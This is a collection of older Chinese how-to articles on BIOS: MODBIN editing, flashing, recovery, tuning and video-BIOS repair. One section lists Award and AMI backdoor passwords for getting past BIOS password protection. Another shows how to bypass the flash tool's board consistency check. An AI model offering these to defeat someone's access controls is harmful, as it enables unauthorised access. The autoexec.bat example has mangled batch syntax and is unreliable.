    MODBIN也是Award公司出品的一款功能强大的BIOS修改工具，它可以修改BIOS中的默认参数或菜单选项。该软件的大小只有202KB，目前的最新版本是6.1.00.37版，朋友们可以到驱动之家（http://file2.mydrivers.com/tools/board/MODBIN6.exe）下载它。
    MODBIN是一款命令行工具，只能在DOS窗口下运行（Windows的“MS-DOS”方式也可以，但可能有一些乱码出现），建议朋友们将MODBIN复制到一张启动盘上，这样安全一些。
    MODBIN主要功能
    在修改BIOS内容之前，有一点要提醒大家:你必须先获得主板的BIOS文件（可以通过Awdflash.exe的备份功能得到），或者到驱动之家下载，并且需要将BIOS文件保存到MODBIN主程序所在的目录下。
    接下来，我们可用软盘启动到DOS方式下，运行MODBIN6.EXE文件，此时会出现一个对话框，其中列出了当前目录下的所有BIOS文件，请选择一项加载，稍候片刻即出现主窗口。这里的8个菜单就是MODBIN的主要功能，回车后即可分别进入相应操作窗口。注意这里无法使用鼠标，只能通过光标键、空格键进行操作。
    1.设置个性化的万能密码
    很多人都喜欢在BIOS中设置超级密码和用户密码，但有时容易忘记。因此，有必要设置一个万能密码。方法是:选择主界面中的“Change BIOS Option”菜单项，回车后可以看到两个选项:“BIOS Timing”（设置输入/输出设备的时间参数）和“BIOS Option”（修改BIOS标准设置值）。将光标移到“BIOS Option”上回车，在出现的窗口中选择“Security Default Password”项，其后显示了8个“*”号，这里就是用来设置万能密码的，此时你只要将光标移到“*”上，直接键入新的万能密码即可。下面的“Security Mumber of Retry”则是用来设置允许用户输入错误密码的次数。
    2.修改BIOS中的文字信息
    我们还可以利用MODBIN修改BIOS中的文字信息，例如将“CeleronⅡ”修改为“Pentium Ⅲ”，这够夸张吧？首先运行MODBIN，然后加载需要修改的BIOS文件，接下来需要切换到Windows窗口中到MODBIN路径下查找一个叫做ORIGINAL.TMP的文件，注意这时你不能关闭MODBIN运行的MS-DOS窗口，否则就找不到这个文件了。接下来，我们可以利用WinHex等编辑工具打开ORIGINAL.TMP文件，在“Search”菜单下打开“Find text”对话框中输入需要查找的字符如“Pentium Ⅲ”，找到后就可以将它进行修改了。
    3.自定义BIOS菜单项和缺省设置
    MODBIN最显著的功能就是可以自由定义BIOS中所显示的菜单项（也就是将若干菜单项隐藏起来），或者更改成其它内容，方法是:选择主界面中的“Edit Setup Screen”菜单项，回车后就可以任意选择一个BIOS菜单项进行设置。
    （1）修改菜单项的显示内容
    我们可以对菜单项的显示内容进行修改，但要注意，只有显示为白色的内容才能进行修改。选中一个菜单项，回车两次后即可直接修改，这下扮酷可有资本了吧？
    （2）设置菜单项的显示属性
    按下光标键，可以选择菜单项的不同显示属性，如“Normal”代表“正常显示”，“Show only”代表“只读”，“Disable”代表“禁止”；选择某种属性后按下空格键即可完成修改，这样就大大方便了网吧或公共机房的管理人员。
    利用这一功能，我们就可以开启主板未提供的高级设置选项，如“AGP APERTURE SIZE”是用来定义AGP显卡可使用的系统内存容量，一般可在8MB～128MB之间自由调节。但某些主板将此值固定为64MB，用户无法自由调节（对当前的主流3D游戏来说，32MB的显存是远远不够的，此时必须使用系统内存），此时就可以通过MODBIN来打开被禁止了的“AGP APERTURE SIZE”设置值，先将原来缺省的设置值由“Disabled”修改为“Enabled”，然后再修改调节的幅度。
    （3）定义菜单项的缺省设置值
    我们知道，BIOS设置程序中的默认设置值有些是“Enabled”，有些是“Disabled”，我们可以在这里自由改变缺省设置值，“BIOS default”是BIOS厂商的缺省设置值，“SETUP default”是设置程序中的缺省设置值，选中某项回车即可进行修改。
    4.调用其它BIOS工具
    主界面中的最后一个菜单“Plug in Utility”可以调用其它的BIOS工具，如CKCMOS（对CMOS设置进行校验）、CBROM（提取或添加数据文件）、Awdflash（BIOS更新工具），但前提是已经将这些工具拷贝到MODBIN的安装路径下。
    经过上述修改后，你的BIOS文件就打上了个性化的“烙印”，不过，要最后看到修改后的结果，还必须将修改后的BIOS文件写入主板的BIOS芯片中。好了，心动不如行动，大家快去试试吧！


BIOS有问题而又找不到升级文件

《一键清理系统垃圾》

BIOS有问题而又找不到升级文件

可以试着找到主板型号不同但BIOS生产商相同的BIOS。下面的文字是从新闻组里摘录的：“最近我在本人的Triton芯片组的主板上进行了一系列的BIOS的测试，是为了检验一种主板能否使用不同主板生产商提供的BIOS。结论是：大多数是可以的。所以，即使是不同生产商提供的BIOS也可以一定限度地通用。 </P><P>实验内容：我想升级我的AmptronPM7700B主板的BIOS，版本号从v4.50PGBIOS到v4.51PG，希望能纠正电源管理方面的错误（显示器随机空白，硬盘老处于“睡眠”状态）。我的机器配置是：Maxtor1.6GB硬盘（IDE0的master模式），Aztech的4xCD-ROM（IDE1的Slave模式） ，SB16声卡，AMD5x86-75超频到90MHz（老式的SSA-5版本）。 </P><P>实验里所使用的BIOS有：ASUS（华硕）460FX主板使用的Awardv4.51PG，FIC的PT-2003430FX主板使用的Awardv4.50PG，ECSTR5510主板使用的Awardv4.51PG，还有ShuttleHOT-541主板使用的Awardv4.51PG。 </P><P>请注意，如果主板生产商提供的BIOS升级程序和其他的不同（比如华硕），它就不能被用来升级别的主板的BIOS。所以，除了华硕的主板，AWDFlashv5.2都能顺利地升级其他主板BIOS。笔者还发现，MR-BIOS的29C010.EXE（请使用和你的主板芯片组相符合的软件）能更新所有主板的BIOS。在ftp://ftp.mrbios.com里你可以找到29C010.EXE和28F010.EXE，在那里长度大于60k的zip文件里有不少好的东西。 </P><P>结果：华硕（ASUS）BIOS工作正常，但内存只检测到8MB（实际上有16MB），因为内存的原因，Win95还“发现”了不少新的设备。升级了FIC430FXBIOS，机器不能访问软盘（尝试后，系统死机），但硬盘正常启动和工作。ECSTR5510BIOS表现最好，最终我也采用了它。它解决了电源管理的错误，还解决了以前按SHIFT-F5不能直接进入纯DOS模式的问题。（该问题估计是Amptron的BIOS和AMD5x86CPU不兼容的缘故）同时，在WinTune96的测试下内存和硬盘的访问速度也增加了几个MB/S。ShuttleHOT-541BIOS和ESC的BIOS一样，解决了同样的问题。但在win95下，不能直接检测到光驱。 </P><P>结论：所有实验用的BIOS都没有导致永久性的、不可恢复性的错误，90-100%的功能都正常（ECS的甚至解决了原AmptronBIOS的问题）。如果你也想尝试这样的作法，请记住一定要使用相同芯片组的BIOS升级文件，输入/输出（I/O）的芯片也要和你自己的相同。我主板上所使用的I/O芯片是UM8669。如果你的I/O芯片不同，升级后可能会导致串口不工作或更糟的结果。在硬盘里保存一份完好的BIOS文件和升级软件。避免如果软盘不能启动，恢复不了BIOS的情况。 </P><P>注意：实验用的BIOS没有一种让我的机器变得彻底毁坏，不过你的运气就不一定这么好了。一般初学者不要使用不同生产商提供的BIOS，除非你有EPROM烧录器，写片BIOS芯片对你来说非常容易 ，有同种类型的芯片，能非常熟练地操作“热插拔”技术，有冒险的勇气。


如何进入BIOS设置?

《一键清理系统垃圾》

如何进入BIOS设置?

    不同的BIOS有不同的进入方法，通常会在开机画面有提示。
    Award BIOS：按“Del”键
    AMI BIOS：按“Del”或“ESC”键
    Phoenix BIOS：按“F2”键
    Compaq（康柏）按“F10”键


如何破解BIOS里的密码保护？

《一键清理系统垃圾》

如何破解BIOS里的密码保护？

1、针对Award BIOS：

试试下面的密码：AWARD_SW，j262，HLT，SER，SKY_FOX，BIOSTAR，ALFAROME，lkwpeter，j256，AWARD?SW，LKWPETER，Syxz，aLLy，589589，589721，awkward，CONCAT。也可在网上下载有关的破解程序。

2、针对AMIBIOS：

试试下面的密码:AMI，BIOS，PASSWORD，HEWITTRAND，AMI?SW，AMI_SW，LKWPETER，A.M.I.。也可在网上下载有关的破解程序。


如何升级我的BIOS？

《一键清理系统垃圾》

如何升级我的BIOS？

     升级BIOS需要BIOS的读写程序（Flasher）和BIOS的最新数据文件。读写程序将把这个数据文件写入到BIOS的芯片里。下面是不同BIOS的升级命令：

awdFlashxxx.bin（对Award BIOS）

amiFlashxxx.bin（对AMI BIOS）

mrFlashxxx.bin（对MR BIOS）

注意：在读写器要求你存储当前的BIOS时，选“YES”，这样在升级BIOS时如果出现问题了还可以恢复原来的BIOS。有些主板生产商提供自己的升级软件程序（一般不能拷贝），注意在升级前在BIOS里把“SystemBIOSCacheable”的选项设为NO。千万不要使用错误的BIOS数据文件，否则你的机器就不能启动了。

升级AwardBIOS时出现提示“Insufficientmemory（内存不足）”怎么办？

解决方法有：

A、在CMOS的“ChipsetFeatures”的设置里，Disable掉“VideoBiosCacheable”。

B、按Esc，F10，存储退出。

C、重启动，在出现"Windows Starting"时按Ctrl+F5，这可以不加载Drvspace.bin，省了大约108K的内存空间。

D、开始升级BIOS，重启动。

E、重进入CMOS的“Chipset Features”的设置里，Enable“VideoBiosCacheable”。按Esc,F10，存储退出。

如何恢复损坏的BIOS？

方案一：利用根区BIOS（Boot-blockBIOS）

当今大多数基于AWARDBIOS的主板里都有根区BIOS，这是个在升级BIOS时不会被覆盖的一小部分BIOS。它只支持很基本的硬件如：软盘等。如果你的显卡是PCI的，在BIOS被损坏后你的屏幕将是漆黑一片，因为根区BIOS只支持ISA的显卡。根区BIOS可以执行可引导软盘上的AUTOEXEC.BAT。这样我们可以把AwardFlasher和正确的BIOS文件（*.bin）放在软盘上并在AUTOEXEC.BAT里加入BIOS升级命令。

方案二：得到新的BIOS芯片

A、联系主板生产商，看是否他们能提供BIOS芯片。有些生产商是免费提供的。

B、联系卖相关芯片的电脑公司，如UnicoreSoftware（http://www.unicore.com/）或MidcoComputers（以前的RCSystems公司，http://www.midcocomputers.com/）。

方案三：热交换

注意：本人不对本方法导致的任何问题负责，风险自负。

用另外一块可以正常使用的BIOS芯片来更换当前损坏的芯片，而正常BIOS芯片的主板必须尽量和损坏的一致。在正常芯片的机器上先把“SystemBIOScacheable”设为ENABLE，进入DOS后，把正常的芯片拔掉，用损坏的芯片来替代，然后正确地升级BIOS即可。

注意：建议使用MR BIOS的读写程序，他们的产品名声最好。可以访问ftp://ftp.mrbios.com找相关软件。

方案四：（适用于INTEL主板）

把FlashRecovery的跳线放在recoverymode的位置，把可启动的BIOS升级软盘放入，启动机器。因为没被覆盖的根区BIOS不支持PCI的显卡，这时屏幕上什么都没有。你可以通过鸣笛声和软盘LED来观察。当机器响了一下，接着软盘的LED亮时，系统就正在升级你的BIOS。当软盘的LED灯灭时，说明恢复已完成，关机。把跳线恢复到缺省位置，重启动继续恢复。


如何优化电脑系统的BIOS？

《一键清理系统垃圾》

如何优化电脑系统的BIOS？

( 2002年01月24日14:32:15 TT 阅读：74 )

    1、在Standard CMOS Setup里没有连接IDE设备的端口的TYPE和MODE设为None。

    2、将CPU Internal Cache、External Cache设为Enabled，打开CPU一二级缓存。

    3、将System Boot Up speed设为High。使系统引导速度为高速。

    4、将Boot Sequence设为C，A:。

    5、将Floopy Drive Seek At Boot设为Disable。使启动时不检测软驱。

    6、将Above 1MB Memory Test设为Disabled。启动时不检测1MB以上的内存。

    7、将Boot Up Floppy seek设为Disabled。这样做可以使启动时不对软驱进行寻道操作。

    8、将Video BIOS Shadow设为Enabled。使显卡上的BIOS映射到内存中，提高显示速度。

    9、将System BIOS Shadow设为Enabled。使系统BIOS映射内存中，改善性能。

    10、将Video BIOS Cacheable设为Enable。使显卡上的BIOS映射到高速缓存。

    11、将System BIOS Cacheable设为Enbaled。使主板的BIOS映射到高速缓存。

    12、将Cache Timing设为Fastset。

    13、将SDRAM CAS Latency Time设为3。设置SDRAM的延迟时间。如果你的内存质量不是很好，设成3会使死机情况大大减少。

    14、采用VIA Apollo Pro系列主板芯片的BIOS有一项“DRAM CLOCK”将其值改为HCLK+33，这样你的内存就会工作在系统外频+33的频率下了，如果你的CPU为Celeron，那系统的性能提高将是极为明显的，如果你的内存不争气，你可将“DRAM CLOCK”的值设为“HOST CLK(系统外频)或“HOST-33”。这是因为Apollo Pro系列芯片有独特的内存异步技术。


如何在DOS下自动刷新BIOS

《一键清理系统垃圾》

如何在DOS下自动刷新BIOS

刷新BIOS一直是“菜鸟”头痛的事，因为我们一般都是在DOS状态下刷新BIOS的，危险性比较大。怎样在DOS下安全地刷新BIOS呢？下面笔者根据自己的经验谈谈如何在DOS下自动刷新BIOS（以AwardBios为例）。
    首先，如果你的系统处于超频状态，请先恢复正常，然后关闭BIOS设置中所有有关电源管理的项目，并关闭BIOS缓存（“sysetm BIOS Cacheable”）和显卡BIOS缓存（“Video BIOS Cacheable”）。
    然后在DOS下插入一张已经格式化的软盘，用“SYS C：　A：”命令将系统文件复制到A盘，然后把Awardfalsh工具（一般主板配套光盘里有）和最新的BIOS文件（假设为newbios.bin）一起复制到A盘，最后在软盘上创建一个批处理文件autoexec.bat，内容如下：
    @echo off（回车）
    if exist oldbios.bin goto awdflash.exe newbios.bin oldbios.bin/py/sy/cc/cp/cd/sb/rgoto（回车）
    end：awdflash.exe oldbios.bin/py/sy/cc/cp/cd/sb/r：
    end
    好了，现在软盘上已经有了以下文件：Awardfalsh.exe、newbios.bin、autoexec.bat、msdos.sys、io.sys和command.com。用软盘启动计算机后，计算机将自动刷新BIOS了，如果刷新失败也可以用这张软盘来恢复以前的BIOS。
    注意：AwardFalsh刷新工具版本必须在V7.70以上，刷新后将软盘从软驱中取出，并进入BIOS设置从新调整即可。


软驱故障与刷新BIOS

《一键清理系统垃圾》

软驱故障与刷新BIOS

好友的电脑坏了，刚开机自检，便停了下来，出现“FDD Controller Failure（80H）”提示。这不就是软驱设置有问题嘛，我先按下Del进入CMOS设置程序，仔细地检查了一遍设置，并没有发现问题。是软驱线松了吗？我打开机箱一看，软驱后面的数据线和电源线接得好好的，而且方向也没有接错。那么故障会不会出在软驱身上？于是我把软驱连同数据线拆下来拿到别的机器上试了一下，软驱完全没有问题。我又换了一个新软驱拿到这台机器上，故障依旧。
    此后，我又屏蔽掉CMOS中的错误检测并重装了WINDOWS 98，其结果不是找不到PS/2鼠标、MODEN，就是在设备管理器中出现了许多乱七八糟的黄色惊叹号。此时，我开始怀疑主板了。于是我问了好友在电脑出现故障之前都干过些什么，他说他昨天在上网时，下载了一个最新MVP4主板的BIOS程序，并且用Aflash.exe程序将它刷新了。这时，一切问题均真相大白：故障现象表现在软驱及其它外设，病因却在BIOS。
    故障原因：这台机器是在刷新了主板的BIOS程序后，首先软驱无法使用，然后无法进入WINDOWS，勉强进入WINDOWS后，鼠标器和串并口都无法使用。这样我们不难发现整台机器的故障便是由于刷新了BIOS程序造成的。这台机器主板的品牌不明，只知道它采用的是台湾威盛公司的VIA MVP4芯片组，北桥芯片是VT82C694X，南桥芯片是VT82C686A，存储BIOS程序的是一粒型号为“SST29E01”的EEPROM（电可擦除可编程存储器），而不是我们常见的Flash ROM（闪存）。众所周知，现在世界上生产微机主板芯片组的厂家就只有INTEL、ALI、VIA和SiS等少数几家，而众多主板生产厂家所生产的主板，大多采用这些厂家生产的芯片组，所以我们在购买主板时一般都只关心主板的芯片组类型。这样就容易给我们造成一种误解，简单地认为只要主板所采用的芯片组相同，那它们的BIOS程序也一定相差不了多少，从而忽略了主板上另一个重要的器件──I/O芯片。不同厂家所生产的主板，不仅制造工艺不同，而且所采用的I/O芯片及电子元器件也不会相同。主板上的BIOS芯片所存储的就是这块主板的所有的硬件信息，所以不同厂家生产的主板，虽然采用的芯片组相同，但是它们的BIOS程序是一定不能通用的。如果用了别的厂家主板的BIOS程序来刷新主板，很有可能会造成电脑在启动后，在BIOS接管系统时，便无法控制主板上的硬件设备和I/O接口。现在可以断定这台电脑故障的原因就是由于升级BIOS程序时，用了别的厂家的BIOS程序而造成的。
    故障处理：显然，只要把原来的BIOS程序写回去就能够恢复正常了。可是粗心的好友不但没有备份原有的BIOS程序，而且连主板的包装和说明书也弄丢了。这时，只好上网去找来了MVP4主板的BIOS程序（http://www.award.com.tw/download/bios）。因为把BIOS ROM插到电脑上后再用Aflash.exe去刷写太麻烦了，所以我去买了几个1兆的EPPROM，又借来了一台ROM编程器，然后我和朋友两人，一个写BIOS，一个插到主板上试。在我们将第0087号BIOS插到BIOS插座后，打开电脑，终于找到了软驱，在DOS下鼠标也恢复了正常，接下来赶紧格式化C盘，重装WINDOWS 98及驱动程序，一切都恢复正常，故障解决了。
    经验教训：现在有许多的电脑玩家常常试着用一些品牌机的BIOS程序来升级自已的主板或显卡，从表面上看，一块杂牌的板卡转眼间成了名牌的主板或显卡，可是这样做不仅存在着很大的危险性，而且弊大于利。不同厂家生产的板卡不仅制造工艺不同，而且采用的接口IC及电子器件也不一样，他们所提供的BIOS程序理所当然也不能通用。我奉劝各位电脑玩家不要随便用不同厂家的BIOS程序来升级你的主板或显卡，只有使用原厂家所提供的BIOS程序才能最大限度地发挥主板的效能，升级BIOS时也要到厂家的网站或知名的驱动程序网站上去下载软件才安全。


什么是BIOS 2

《一键清理系统垃圾》

什么是BIOS 2

本文将介绍了BIOS的以下几个方面的含义：BIOS中断例程；POST上电自检；系统CMOS设置；

系统开机启动 BIOS，即微机的基本输入输出系统(Basic Input-Output System)，是集成在主板上的一个ROM芯片，其中保存有微机系统 最重要的基本输入/输出程序、系统信息设置、开机上电自检程序和系统启动自举程序。在主板上可以看到BIOS ROM芯片。一块主板性能优越与否，很大程度上取决于板上的BIOS管理功能是否先进。

一、BIOS中断例程 即BIOS中断服务程序。它是微机系统软、硬件之间的一个可编程接口，用于程序软件功能与微机硬件实现的衍接。 DOS/Windows操作系统对软、硬盘、光驱与键盘、显示器等外围设备的管理即建立在系统BIOS的基础上。程序员也可以通过 对INT 5、INT 13等中断的访问直接调用BIOS中断例程。

二、BIOS系统设置程序 微机部件配置情况是放在一块可读写的CMOS RAM芯片中的，它保存着系统CPU、软硬盘驱动器、显示器、键盘等部件的信息。 关机后，系统通过一块后备电池向CMOS供电以保持其中的信息。如果CMOS中关于微机的配置信息不正确，会导致系统性能降 低、零部件不能识别，并由此引发一系统的软硬件故障。在BIOS ROM芯片中装有一个程序称为“系统设置程序”，就是用来 设置CMOS RAM中的参数的。这个程序一般在开机时按下一个或一组键即可进入，它提供了良好的界面供用户使用。这个设置 CMOS参数的过程，习惯上也称为“BIOS设置”。新购的微机或新增了部件的系统，都需进行BIOS设置。

三、POST上电自检 微机接通电源后，系统将有一个对内部各个设备进行检查的过程，这是由一个通常称之为POST(Power On Self Test,上电自 检)的程序来完成的。这也是BIOS的一个功能。完整的POST自检将包括CPU、640K基本内存、1M以上的扩展内存、ROM、主板、 CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘测试。自检中若发现问题，系统将给出提示信息或鸣笛警告。

四、BIOS系统启动自举程序 在完成POST自检后，ROM BIOS将按照系统CMOS设置中的启动顺序搜寻软硬盘驱动器及CDROM、网络服务器等有效的启动驱动器 ，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动。


什么是CMOS

《一键清理系统垃圾》

什么是CMOS

什么是CMOS

   CMOS（本意是指互补金属氧化物半导体——一种大规模应用于集成电路芯片制造的原料）是微机主板上的一块可读写的RAM芯 片，用来保存当前系统的硬件配置和用户对某些参数的设定。CMOS可由主板的电池供电，即使系统掉电，信息也不会丢失。 CMOS RAM本身只是一块存储器，只有数据保存功能，而对CMOS中各项参数的设定要通过专门的程序。早期的CMOS设置程序驻留 在软盘上的(如IBM的PC/AT机型)，使用很不方便。现在多数厂家将CMOS设置程序做到了BIOS芯片中，在开机时通过特定的按键 就可进入CMOS设置程序方便地对系统进行设置，因此CMOS设置又被叫做BIOS设置。 早期的CMOS是一块单独的芯片MC146818A(DIP封装)，共有64个字节存放系统信息,见CMOS配置数据表。386以后的微机一般将 MC146818A芯片集成到其它的IC芯片中(如82C206，PQFP封装)，最新的一些586主板上更是将CMOS与系统实时时钟和后备电池集 成到一块叫做DALLDA DS1287的芯片中。随着微机的发展、可设置参数的增多，现在的CMOS RAM一般都有128字节及至256字节 的容量。为保持兼容性，各BIOS厂商都将自己的BIOS中关于CMOS RAM的前64字节内容的设置统一与MC146818A的CMOS RAM格式 一致，而在扩展出来的部分加入自己的特殊设置，所以不同厂家的BIOS芯片一般不能互换，即使是能互换的，互换后也要对 CMOS信息重新设置以确保系统正常运行. 你认识主板上的BIOS芯片吗？ 介绍常见的BIOS芯片的识别 ROM BIOS是主板上存放微机基本输入输出程序的只读存贮器，其功能是微机的上电自检、开机引导、基本外设I/O和系统CMOS 设置。 主板上的ROM BIOS芯片是主板上唯一贴有标签的芯片，一般为双排直插式封装(DIP)，上面印有“BIOS”字样。虽然有些BIOS 芯片没有明确印出“BIOS”，但凭借外贴的标签也能很容易地将它认出。 586以前的BIOS多为可重写EPROM芯片，上面的标签起着保护BIOS内容的作用(紫外线照射会使EPROM内容丢失)，不能随便撕下。 586以后的ROM BIOS多采用EEPROM(电可擦写只读ROM)，通过跳线开关和系统配带的驱动程序盘，可以对EEPROM进行重写，方便 地实现BIOS升级。 常见的BIOS芯片有AMI、Award、Phoenix等，在芯片上都能见到厂商的标记。


什么是可擦写（Flash）的BIOS？

《一键清理系统垃圾》

什么是可擦写（Flash）的BIOS？

     BIOS的发音是"bye-ose"，是基本输入/输出系统的缩写。BIOS是系统内附的、在电脑没有访问磁盘上程序之前决定机器基本功能的软件系统。就PC而言，BIOS包含了控制键盘、显示屏幕，磁盘驱动器，串行通讯设备和很多其它功能的代码。一般地，BIOS存储在主板上的ROM芯片（所以通常叫ROMBIOS），这确保了BIOS的一般可用性和不会因为磁盘错误而损坏。它也确保了机器能够启动。因为RAM比ROM的速度快 ，很多的机器制造商设计的BIOS在机器启动时能从ROM被拷贝到RAM去运行，这项技术也叫shadowing。当今，在很多PC里是FlashBIOS，意味这BIOS是存储在可重新改写的Flash内存芯片 ，如果需要的话改写毫不费力。PC机的BIOS是标准化的，所以所有的PC在BIOS这一级别上是类似的（尽管因为生产商不同，BIOS的版本非常多）。而常说DOS功能是通过磁盘上的软件实现的，所以不用更换BIOS，你可以很简单地升级你的DOS系统。能够处理Plug-and-Play（PnP）设备的BIOS叫PnPBIOS，或PnP-awareBIOS。一般而言，这些BIOS出现在Flashmemory里。


通过CMOS设置定时开机

《一键清理系统垃圾》

通过CMOS设置定时开机

    笔者是公司微机中心的主管，现公司的网络服务器由自己开启。偶尔有事不能准时上班，但服务器必须在上班时间准时开启，于是就巧用主板上的BIOS功能让服务器定时开启，这样就不会耽误大家的工作。

    通过CMOS设置实现定时开机的设置过程如下：首先进入“CMOS SETUP”程序(大多数主板是在计算机启动时按DEL键进入)；然后将光条移到“Power Management Setup”选项上，回车进入其子菜单；再将“Resume by Alarm”项设置成“Enabled”，并在“Date(of Month)Alarm”项中设置每月开机日期(0表示每天，1表示每月1日，2表示每月2日，……)，在“Time(hh:mm:ss)Alarm”项中设置开机时间；最后保存设置，重新启动，当关闭计算机后，你的计算机将在你规定的时刻自动启动。

    注意：1.计算机主板必须有“Resume by Alarm”功能才能实现定时开机；2.要实现定时正常开机，必须取消开机Password功能；3.最关键的一点是要接通主机电源。


突破BIOS容量的一致性检查

《一键清理系统垃圾》

突破BIOS容量的一致性检查

    我们知道，为了防止升级BIOS时出现问题，现在的主板一般都有主板与BIOS文件一致性的检查。尽管升级BIOS时具有了一定的保险，但是对于高手而言，在做一些其他的事情时就显得不方便了，具体表现在：热插拔修复其他主板的BIOS，或者想在2Mb的芯片中写1Mb的程序，刷新程序不允许操作。功夫不负有心人，本人在研究了高版本的AMI刷新程序时发现，高版本的AMI刷新程序可以向芯片中强制写入其他主板的BIOS文件。亦即，我们可以让它不理睬主板与BIOS文件的一致性检查，从而方便地在自己的主板上写其他任意主板的BIOS。

    至于操作的具体方法，在没有条件的情况下，大家大多采用的是热插拔法，由于热插拔法具有一定的危险性。在此，不介绍该方法，但大家尽可以举一反三，把下面介绍的方法用在热插拔上。在《中国电脑教育报》以前的文章中曾经介绍过用双BIOS组件打造超级BIOS烧录器的方法。下面，我们就介绍一下AMI 8.21刷新程序的使用技巧。

    启动开电脑，进入纯DOS模式，切换到要写的芯片，然后启动AMI 8.21刷新程序AMI821.EXE（见图）。

    在这里，你会发现，软件已自动识别出你的BIOS芯片的类型。注意，该芯片不是用来启动电脑的芯片，而是我们要写的芯片。输入要写的文件，就可以把文件写入到该芯片中了。

    如果你想在2Mb的芯片中写入1Mb的程序，用上面的方法是不行的，因为程序检测出的芯片是2Mb的，但是由于要写入的是1Mb的文件，程序发现二者大小不符，还是不会运行，此时，需要手工进行一些调节。下面假设我们想在一片2Mb的W29C020中写入一个1Mb（128KB）的程序。

    首先，让我们看一下AMI程序的菜单项：

    Go ahead：开始进行升级操作。

    File：调入升级的BIOS文件。

    Switch：设置升级的一些参数。

    Part List：支持的芯片型号列表，这就是我们今天要用到的。

    Chipset List：支持的芯片组列表。

    Auto Detect：自动检测，检测芯片组、BIOS芯片及容量。有时，我们不用自动检测，而是手工设置一些参数。

    用方向键，把光标移到Part List项，敲回车后，进行芯片型号选择窗口，在此窗口中，用上下键选择芯片的具体型号，用左右键选择芯片的厂家。由于是Winbond的芯片，我们用左右键找出该厂家的列表，然后用上下键找出其1Mb的型号W29C011。

    选择完毕后，敲Esc键返回主菜单，读入文件后，即可进行升级操作。此时，不必理会程序提示的错误信息，一路回车即可。最后程序开始进行升级操作，校验成功后，此操作即告结束。

    对该软件进行多次实验，可以发现，它不存在主板与BIOS文件一致性检查，即使主板原来使用的芯片是1Mb的，也可以方便地对1Mb、2Mb和4Mb的芯片进行编程。有了它，难道不等于我们有了一个超级“烧录器”？

    编者注：此工具仅是针对AMI的BIOS，对于Award的BIOS无法使用，不知是否有其他高手可以找到对于Award BIOS的刷新方法，欢迎大家投稿进行交流。

    注意：本文介绍的方法具有一定的危险性，非高手不要尝试，否则后果自负！


我需要升级BIOS吗？

《一键清理系统垃圾》

我需要升级BIOS吗？

     升级BIOS有很多的理由，其中有重要的，也有不太重要的。最重要的原因就是和Windows有关。如果在一台机器上的BIOS过时了，Windows的配置就不会达到最佳。现在市场上出售的硬盘容量都会远大于528M，为了支持这些大容量硬盘，BIOS必须支持LBA（LogicalBlockAddressing，逻辑块寻址 ）的技术。如果你的BIOS不支持，而你又想使用硬盘的全部容量，就必须使用能“欺骗”BIOS的专用软件。而这些专用软件的使用会让Windows访问硬盘时采用兼容模式，造成性能的降低。为了让Windows能充分支持Plug'nPlay的设备，你也需要PnP-BIOS。这也是升级BIOS的重要原因。第三个重要原因就是升级BIOS可以解决以前BIOS的bugs。其它不太重要的原因包括：BIOS有新的设置，从光驱启动机器，从SCSI设备上启动等等。


显卡BIOS刷新失败后的处理方法

《一键清理系统垃圾》

显卡BIOS刷新失败后的处理方法

  前些天从二手论坛里以80元买了一块杂牌TNT2 M64显卡，想用来代替我的集成显卡，但寄到我手中试机时发现使用时出现花屏现象，难怪会这么便宜！但想想总不能花钱买垃圾吧，于是打算将它的BIOS刷新为耕升显卡的BIOS，以改善显示效果。

    故障状况

    上网下载了刷新程序“NV3flash.exe”，在DOS下进行测试发现可以升级，因此下载了BIOS程序之后开始升级，由于是第一次升级显卡BIOS，所以很紧张，结果升级后发现系统启动后显示器无显示。怀疑是下载的BIOS文件不对，再仔细一看，原来我将16MB显卡的BIOS当成了32MB的刷了。眼看着这块显卡就这么离我而去……不行，说什么我也要将它抢救回来。

    解决方法

    显卡BIOS刷新失败后的处理办法有两种：一种是重新升级，另一种是写回原来的BIOS文件。如果你不能确定失败的原因，那么可以先试着重新升级一次，不成功的话，再写回原来的BIOS文件。由于我知道失败的原因，因此只需要重新升级即可。没办法，只好将这块AGP显卡拔下来，将显示器与主板集成的显卡连接，上网下载了一个正确的BIOS文件，并将它的名称改为“1.rom”，然后与刷新程序一起拷贝到软盘中。由于没有PCI接口的显卡，所以这次升级只能摸黑进行了。为了能够准确地进行升级，我计算了一下从自检到用软盘启动计算机所需要的时间，大约需要一分钟左右。

    好了，将系统启动顺序改为从“A”盘启动后，重新将这块“垃圾”显卡插到主板上，然后开机。听到“嘀”的一声，说明计算机已经正常启动，在软驱灯一阵闪烁之后，我看了看表，时间差不多了，按照记忆中的原定刷新程序再一次刷新显卡BIOS，估计差不多已刷新完毕，重新启动计算机，果不其然，进入系统之后花屏的现象已经得到了解决。

    问题是解决了，但后来我想，如果没有PCI显卡的话采用上面的方法有点冒险。其实如果我们能够断定是显卡刷新失败的话（显示器无任何信息，但系统能够启动），那么可以在启动盘中编辑一个“Autoexec.bat”文件，让它在进入DOS模式后能够自动完成刷新工作，这样不就安全多了嘛！即使在黑屏情况下，我们仍然能够从容地进行升级工作。制作自动刷新BIOS的启动盘的方法如下：在DOS状态下将软盘格式化，并将刷新程序与BIOS文件拷入软盘，再把C盘根目录下的“Autoexec.bat”复制并粘贴到软盘中，右键点击该文件，在弹出的菜单中选择“编辑”，然后在记事本中删除全部内容，键入“A:\ NV3flash.exe 1.rom”，保存修改后关闭记事本。此处，“NV3flash.exe”为刷新程序，而“1.rom”则是需要刷新的BIOS文件（为了好记所以将名字都改简单了，要注意两者之间有空格）。

    当刷新显卡BIOS失败后，就可以利用这张软盘启动计算机，并自动完成刷新工作。

    有的刷新程序在运行后往往会提示要不要保存原有的BIOS文件，这种情况在批处理文件中怎么解决呢？首先，我们可以在DOS下运行“NV3flash.exe /？”，查看一下它的有关参数，然后将需要的参数以“/”的方式加在刚才的那个批处理文件后面即可。比如说需要自动完成BIOS刷新工作，则将批处理文件改为：“A:\NV3flash.exe 1.rom/py”。其他的参数大家可参照以上方法自行查阅。

    其他方案

    如果你有一块PCI显卡的话，那么问题就简单多了。当刷新失败后，我们只需把刷新失败的AGP显卡拔下，将PCI显卡插入到PCI插槽中并将之与显示器连接，打开机器后按键盘上的“Delete”键进入主板BIOS进行参数设置，在菜单中将“Integrated Peripherals”下的“Init Display First（显卡优先设置）”中的参数改为“PCI Slot”。保存设置后重新启动计算机，这样可再次进入DOS模式下对AGP显卡的BIOS进行刷新。结束后只要将PCI显卡取下并将显示器与AGP显卡连接即可。
